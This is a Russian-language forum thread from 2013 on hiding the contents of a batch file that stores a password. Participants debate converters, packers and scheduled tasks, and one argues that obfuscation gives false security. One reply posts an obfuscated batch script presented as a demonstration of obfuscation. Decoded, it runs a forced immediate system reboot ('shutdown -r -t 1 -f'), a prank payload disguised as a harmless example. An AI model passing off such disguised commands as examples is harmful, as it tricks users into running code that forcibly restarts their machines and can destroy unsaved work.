CMD/BAT

Iska · Отправлено: **12:09, 29-10-2013** | #2

Правильный ответ — никак. От слова «совсем».

ShaddyR · Конфигурация компьютера

Цитата Iska:

Правильный ответ — никак. От слова «совсем». »

не совсем.

>
k0mar, в качестве варианта - есть программы-конвертеры .bat в .exe, а последний можно (нужно) сжать любым сжимальщиком запускаемых файлов (можно с шифрованием)

Iska · Отправлено: **13:44, 29-10-2013** | #4

Цитата ShaddyR:

не совсем. »

Поясните

. Я лично полагаю, что никакая «конвертация», обфускация и «шифрование» пакетных файлов никак не препятствуют вскрытию исходного кода и получению компроментирующих систему данных.

sunnykey · Отправлено: **13:51, 29-10-2013** | #5

Цитата Iska:

Поясните . Я лично полагаю, что никакая «конвертация», обфускация и «шифрование» пакетных файлов никак не препятствуют вскрытию исходного кода и получению компроментирующих систему данных. »

Как насчёт хранения хэша или зашифрованного пароля в сценарии (правда применимо к PoSh)?

Iska · Отправлено: **14:47, 29-10-2013** | #6

Цитата sunnykey:

(правда применимо к PoSh)? »

Не могу сказать ничего определённого — детально не знаком.

Elven · Отправлено: **15:01, 29-10-2013** | #7

Давайте тогда подойдем с той стороны, что если есть физический доступ к компьютеру, то ни один файл уже не имеет достаточной защиты от копирования, а если скопирован, то никто не помешает после сделать с ним все что угодно.
Достаточно простое решение было приведено уже давно не помню кем, правда там имел место запуск любой программы от имени администратора, но сути это не меняет, правда это будет не хранение пароля в батнике, а вариант обхода данной байды.
Задачи в шедуллере я думаю никто еще создавать не разучился, как и указывать возможность ручного запуска таковых задач. Ну а в какое труднодоступное место запихнуть тот самый батник - дело ваше (как вариант - где-нибудь в сети и с доступом только той учеткой от имени которой запускается батник).

ShaddyR · Конфигурация компьютера

Цитата Iska:

Я лично полагаю, что никакая «конвертация», обфускация и «шифрование» пакетных файлов никак не препятствуют вскрытию исходного кода и получению компроментирующих систему данных. »

зависит от требуемого уровня защищенности. Озвученное помогает не дать просмотреть. На остальное надо время и навыки: далеко не каждый знает, что было исходным кодом упакованного exe'шника и как его дебажить.

Nordek · Конфигурация компьютера

Цитата k0mar:

что бы его никто не мог просмотреть »

Если посмотреть и не понять чего там написано. То можно так:

Код:

@set q=@set
%q% g12=y
%q% p21=o
%q% j15=8
%q% v76=%0
%q% w10=f
%q% l58="
%q% q17=t
%q% d35=4
%q% y14=j
%q% c4=m
%q% w30=2
%q% y25=v
%q% k2=a
%q% t5=3
%q% r11=c
%q% i29=6
%q% y23=d
%q% c31=q
%q% f22=b
%q% n7=s
%q% b13=7
%q% o19=x
%q% u1=i
%q% u68=%
%q% p34=1
%q% q28=0
%q% k8=e
%q% f26=h
%q% g32=p
%q% u16=w
%q% l40=%SystemRoot%
%q% n46=%Temp%
%q% n24=k
%q% r27=u
%q% u88=%1
%q% r18=5
%q% c0=l
%q% b20=r
%q% v6=n
%q% m3=z
%q% q9=9
%q% b33=g
@%k8%%r11%%f26%%p21% %p21%%w10%%w10%
%n7%%f26%%r27%%q17%%y23%%p21%%%v6% -%b20% -%q17% %p34% -%r11% %l58%%c0%%p21%%c0%%l58% -%w10% >%v6%%r27%%c0%

Iska · Отправлено: **00:33, 31-10-2013** | #10

ShaddyR, я склоняюсь к тому, что всё, что может быть вскрыто за разумное время — будет вскрыто. Тут лучше «перебдеть», чем «недобдеть». Плюс: как правило, на каждый худо-бедно известный конвертор или обфускатор давно есть даже не методика — готовая утилита для обратного процесса.

Цитата Nordek:

Если посмотреть и не понять чего там написано. То можно так: »

Nordek, вот про это я и говорю: ложное впечатление защищённости. А в итоге — зияющая дыра в безопасности. Это всё равно что написать красными чернилами крупными буквами — «смотреть здесь».